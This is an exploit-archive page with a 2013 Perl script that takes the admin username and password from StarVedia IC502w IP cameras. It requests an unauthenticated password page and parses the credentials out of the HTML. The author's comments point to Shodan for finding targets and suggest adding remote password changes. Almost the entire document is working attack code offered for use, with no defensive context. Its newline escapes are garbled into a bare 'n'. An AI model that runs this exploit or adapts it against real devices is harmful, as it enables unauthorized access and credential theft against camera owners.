[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : StarVedia IPCamera IC502w IC502w+ v020313 - Username/Password Disclosure
# Published : 2013-03-22
# Author :
# Previous Title : SynConnect PMS (index.php, loginid param) - SQL Injection Vulnerability
# Next Title : Rebus:list (list.php, list_id param) - SQL Injection Vulnerability
#!/usr/bin/perl
#
# [+] StarVedia IPCamera IC502w IC502w+ v020313 remote bypass username/password disclosure exploit
# Author: Todor Donev
# Email: todor.donev at gmail dot com
# Type: Hardware
#
# Thanks to Tsvetelina Emirska the best friend in my life
# and all my other friends for the help and support which
# gives me. Kind regards to all of you, who read my lil'
# exploits.
# Bulgaria, Sofia
# 03.2013
#
# Shodanhq r0x 4 teh lulz!!
# http://www.youtube.com/watch?v=qNyN1AY-YZQ Cheeerzz =))
#
# Another bug, hint: you can edit this code and add some lines for remote change the password.
#####
use LWP::Simple;
if (@ARGV == 0) {&usg;}
while (@ARGV > 0) {
$type = shift(@ARGV);
$t = shift(@ARGV);
}
if ($type eq "-d") {
my $r = get("http://$t/cgi-bin/passwd.cgi?") or die(" $t: Not vulneruble, $!n");
print " [+] StarVedia IPCamera IC502w IC502w+ v020313 remote bypass username/password disclosure exploitn";
print " [!] Exploiting: $tn";
if ($r =~ m/<INPUT type=text name=user size=20 maxlength=19 value="(.*)">/g) {
$result .= " [o] User: $1n";
}else{die(" Try another exploit, $!");}
if ($r =~ m/<INPUT type=password name=passwd size=20 maxlength=19 value="(.*)">/g){
$result .= " [o] Password: $1n";
}else{die("Try another exploit or restart the exploitn");}
sleep(1);
print " [\m/] BINGO!!!na".$result;
}
sub usg(){
print " [!] usg: perl $0 [-r or -d] <victim:port>n";
print " [!] -d: disclosure password optionn";
print " [!] exp: perl $0 -d 127.0.0.1 :)n";
exit;
}